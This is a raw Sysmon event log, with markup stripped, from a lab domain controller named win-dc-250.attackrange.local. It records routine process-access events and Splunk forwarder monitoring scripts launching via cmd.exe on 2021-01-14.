10341000x80000000000000004119Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004118Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004117Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004116Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004115Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004114Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004113Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004112Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004111Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.942{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4329-6000-E100-000000009A01}4108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004110Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.942{08A6967A-4325-6000-B900-000000009A01}11763032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4329-6000-E100-000000009A01}4108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004109Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.943{08A6967A-4329-6000-E100-000000009A01}4108C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004108Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.832{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4329-6000-E000-000000009A01}1148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004107Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.832{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004106Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.832{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004105Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.832{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004104Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.832{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004103Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.832{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004102Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.832{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004101Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.832{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004100Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.832{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004099Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.832{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004098Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.832{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4329-6000-E000-000000009A01}1148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004097Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.832{08A6967A-4325-6000-B900-000000009A01}11763032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4329-6000-E000-000000009A01}1148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004096Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.834{08A6967A-4329-6000-E000-000000009A01}1148C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004095Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.723{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4329-6000-DF00-000000009A01}4212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004094Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.723{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004093Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 